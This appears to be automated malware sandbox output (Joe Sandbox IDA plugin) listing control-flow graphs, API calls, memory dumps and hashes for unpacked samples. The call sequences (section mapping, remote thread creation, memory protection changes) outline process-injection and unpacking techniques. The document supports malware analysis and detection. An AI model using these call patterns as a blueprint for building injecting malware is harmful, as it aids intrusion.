                                                                                                                                                                                                                                          control_flow_graph 22 930bd0-930c37 26 930cd8-930ce6 22->26 27 930c3d-930c40 22->27 28 930da2-930db8 26->28 29 930cec-930cf4 26->29 30 930c48-930c56 27->30 31 930dbe-930ddc 28->31 32 930f3c-930f43 28->32 33 930f46-930fe6 VirtualProtect 29->33 34 930cfa-930d0d 29->34 30->33 43 930c5c-930ca7 30->43 35 930de5-930df0 31->35 36 930dde-930de4 31->36 57 930fe8 33->57 58 930fed-931001 33->58 34->33 37 930d13-930d1f 34->37 35->33 39 930df6-930e02 35->39 36->35 41 930d21-930d27 37->41 42 930d28-930d59 37->42 44 930e04-930e0a 39->44 45 930e0b-930e12 39->45 41->42 42->33 47 930d5f-930d69 42->47 43->33 48 930cad-930cbe 43->48 44->45 45->33 49 930e18-930e22 45->49 47->33 50 930d6f-930d79 47->50 48->33 51 930cc4-930cd2 48->51 49->33 52 930e28-930e32 49->52 50->33 54 930d7f-930d85 50->54 51->26 51->27 52->33 56 930e38-930e3e 52->56 54->33 55 930d8b-930d9c 54->55 55->28 55->29 56->33 59 930e44-930e50 56->59 57->58 59->33 60 930e56-930e67 59->60 61 930e70-930eef 60->61 62 930e69-930e6f 60->62 70 930ef1-930efa 61->70 71 930f05-930f1c 61->71 62->61 70->71 72 930efc-930f03 70->72 74 930f27-930f36 71->74 72->74 74->31 74->32
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(03263590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00930A73,00000001,00000040), ref: 00930FD9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1781823400.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_930000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID: &S!$<1i;
                                                                                                                                                                                                                                          • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                          • Opcode ID: d7e4a3900353f1f0c4c7db1b25a2ac1dd2417cf7fd8ebb819ba5663978ab6078
                                                                                                                                                                                                                                          • Instruction ID: 31c577e698362fab932c750156913685c9d63bb873f0799c896d04a1344b8ec1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e4a3900353f1f0c4c7db1b25a2ac1dd2417cf7fd8ebb819ba5663978ab6078
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFC19E70A042599FCB21CFA9C9906EDFBF1BF88310F648599E459EB246C334AD41CFA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 159 930500-930fe6 VirtualProtect 162 930fe8 159->162 163 930fed-931001 159->163 162->163
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(03263590,?,00000001,0000012C,?,?,?,00000000,00000000,?,00930A73,00000001,00000040), ref: 00930FD9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1781823400.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_930000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: 3b92ff270f7286e197b1ca75446579ed6a3fc41a1e47b01e59fbf39bcca28fb3
                                                                                                                                                                                                                                          • Instruction ID: 7cee0184b8ea40df9bd4537680bf29333ecaa6a4c00d503580a767d4d45e5737
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b92ff270f7286e197b1ca75446579ed6a3fc41a1e47b01e59fbf39bcca28fb3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221E0B590121DAFCB10DF9AC884BDEFBB4FB48310F10812AE918A7240D3B4A954CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 176 7dd059-7dd079 177 7dd0c9-7dd0d1 176->177 178 7dd07b-7dd086 176->178 177->178 179 7dd0be-7dd0c5 178->179 180 7dd088-7dd096 178->180 179->180 184 7dd0c7 179->184 182 7dd09c 180->182 185 7dd09f-7dd0a7 182->185 184->185 186 7dd0a9-7dd0b1 185->186 187 7dd0b7-7dd0bc 185->187 186->187 187->186
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1726557542.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7dd000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c78ecd27acf592b3ec3270ed154a779d59c5b44ca811e4ca4df5263a4a1b21f8
                                                                                                                                                                                                                                          • Instruction ID: ef46f7827560ded22e754c5fe5a2d7b9852d725cdbd17d190f3f6eefe3bb8d2d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c78ecd27acf592b3ec3270ed154a779d59c5b44ca811e4ca4df5263a4a1b21f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C01A271108344AFE7309A26DC84B67BBE8DF81324F18C46BED094A386C37D9C45DAB2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 204 7dd058-7dd079 206 7dd0c9-7dd0d1 204->206 207 7dd07b-7dd086 204->207 206->207 208 7dd0be-7dd0c5 207->208 209 7dd088-7dd096 207->209 208->209 213 7dd0c7 208->213 211 7dd09c 209->211 214 7dd09f-7dd0a7 211->214 213->214 215 7dd0a9-7dd0b1 214->215 216 7dd0b7-7dd0bc 214->216 215->216 216->215
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1726557542.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7dd000_LeVSNPB9FLpXmtLG7mcICpEf.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 07d6fa27462ce703370ba9bfc14fbc12d1a76eb8ea93257fed4e3d01e0b2be64
                                                                                                                                                                                                                                          • Instruction ID: 8b3f23c60ace79b65f67d60e0503d572ba86599030a30b3741dff8d9dc426748
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d6fa27462ce703370ba9bfc14fbc12d1a76eb8ea93257fed4e3d01e0b2be64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45F06271408344AEE7208A16D884B66FFE8EF91734F18C45BED484B286C3799C44CAB1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 112 4018c5 104->112 113 4018bc-4018e3 call 401193 104->113 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 112->113 114->106 117 4015e1-401605 NtCreateSection 114->117 118 401661-401687 NtCreateSection 117->118 119 401607-401628 NtMapViewOfSection 117->119 118->106 123 40168d-401691 118->123 119->118 121 40162a-401646 NtMapViewOfSection 119->121 121->118 124 401648-40165e 121->124 123->106 126 401697-4016b8 NtMapViewOfSection 123->126 124->118 126->106 128 4016be-4016da NtMapViewOfSection 126->128 128->106 130 4016e0 call 4016e5 128->130
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1546783058-0
                                                                                                                                                                                                                                          • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                                                                                          • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 159 4018c5 151->159 160 4018bc-4018e3 call 401193 151->160 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 159->160 161->153 164 4015e1-401605 NtCreateSection 161->164 165 401661-401687 NtCreateSection 164->165 166 401607-401628 NtMapViewOfSection 164->166 165->153 170 40168d-401691 165->170 166->165 168 40162a-401646 NtMapViewOfSection 166->168 168->165 171 401648-40165e 168->171 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 171->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1652636561-0
                                                                                                                                                                                                                                          • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                                                                                          • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 203 4018c5 195->203 204 4018bc-4018e3 call 401193 195->204 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 203->204 205->197 208 4015e1-401605 NtCreateSection 205->208 209 401661-401687 NtCreateSection 208->209 210 401607-401628 NtMapViewOfSection 208->210 209->197 214 40168d-401691 209->214 210->209 212 40162a-401646 NtMapViewOfSection 210->212 212->209 215 401648-40165e 212->215 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 215->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1546783058-0
                                                                                                                                                                                                                                          • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                                                                                          • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 242 4018c5 234->242 243 4018bc-4018e3 call 401193 234->243 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 242->243 244->236 247 4015e1-401605 NtCreateSection 244->247 248 401661-401687 NtCreateSection 247->248 249 401607-401628 NtMapViewOfSection 247->249 248->236 253 40168d-401691 248->253 249->248 251 40162a-401646 NtMapViewOfSection 249->251 251->248 254 401648-40165e 251->254 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 254->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1546783058-0
                                                                                                                                                                                                                                          • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                                                                                          • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 282 4018c5 274->282 283 4018bc-4018e3 call 401193 274->283 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 282->283 284->276 287 4015e1-401605 NtCreateSection 284->287 288 401661-401687 NtCreateSection 287->288 289 401607-401628 NtMapViewOfSection 287->289 288->276 293 40168d-401691 288->293 289->288 291 40162a-401646 NtMapViewOfSection 289->291 291->288 294 401648-40165e 291->294 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 294->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1546783058-0
                                                                                                                                                                                                                                          • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                                                                                          • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 316 40306c 313->316 314->306 315 403070-403075 314->315 315->304 317 403077-40307a 315->317 316->315 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1921587553-0
                                                                                                                                                                                                                                          • Opcode ID: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
                                                                                                                                                                                                                                          • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e1873f1d77be6ac03ef9cfc7342e6364087b58188b66d07b59adfe636bbab3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 319 26d04fa-26d0513 320 26d0515-26d0517 319->320 321 26d051e-26d052a CreateToolhelp32Snapshot 320->321 322 26d0519 320->322 323 26d052c-26d0532 321->323 324 26d053a-26d0547 Module32First 321->324 322->321 323->324 330 26d0534-26d0538 323->330 325 26d0549-26d054a call 26d01b9 324->325 326 26d0550-26d0558 324->326 331 26d054f 325->331 330->320 330->324 331->326
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026D0522
                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 026D0542
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026BE000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_26be000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                          • Instruction ID: f191741fb068a9acdc578911e9c0e9a90ae51c0a1fc7b4e8391b46e5eccf568d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F096359007186FD7203FF9AD8CBAE77E8AF49728F100528EA46911C0DB70E8458A61

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 260003c-2600047 1 2600049 0->1 2 260004c-2600263 call 2600a3f call 2600e0f call 2600d90 VirtualAlloc 0->2 1->2 17 2600265-2600289 call 2600a69 2->17 18 260028b-2600292 2->18 22 26002ce-26003c2 VirtualProtect call 2600cce call 2600ce7 17->22 19 26002a1-26002b0 18->19 21 26002b2-26002cc 19->21 19->22 21->19 29 26003d1-26003e0 22->29 30 26003e2-2600437 call 2600ce7 29->30 31 2600439-26004b8 VirtualFree 29->31 30->29 33 26005f4-26005fe 31->33 34 26004be-26004cd 31->34 35 2600604-260060d 33->35 36 260077f-2600789 33->36 38 26004d3-26004dd 34->38 35->36 42 2600613-2600637 35->42 40 26007a6-26007b0 36->40 41 260078b-26007a3 36->41 38->33 39 26004e3-2600505 38->39 51 2600517-2600520 39->51 52 2600507-2600515 39->52 44 26007b6-26007cb 40->44 45 260086e-26008be LoadLibraryA 40->45 41->40 46 260063e-2600648 42->46 48 26007d2-26007d5 44->48 50 26008c7-26008f9 45->50 46->36 49 260064e-260065a 46->49 53 2600824-2600833 48->53 54 26007d7-26007e0 48->54 49->36 55 2600660-260066a 49->55 56 2600902-260091d 50->56 57 26008fb-2600901 50->57 58 2600526-2600547 51->58 52->58 62 2600839-260083c 53->62 59 26007e2 54->59 60 26007e4-2600822 54->60 61 260067a-2600689 55->61 57->56 63 260054d-2600550 58->63 59->53 60->48 64 2600750-260077a 61->64 65 260068f-26006b2 61->65 62->45 66 260083e-2600847 62->66 68 26005e0-26005ef 63->68 69 2600556-260056b 63->69 64->46 70 26006b4-26006ed 65->70 71 26006ef-26006fc 65->71 72 2600849 66->72 73 260084b-260086c 66->73 68->38 74 260056d 69->74 75 260056f-260057a 69->75 70->71 76 260074b 71->76 77 26006fe-2600748 71->77 72->45 73->62 74->68 78 260059b-26005bb 75->78 79 260057c-2600599 75->79 76->61 77->76 84 26005bd-26005db 78->84 79->84 84->63
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0260024D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
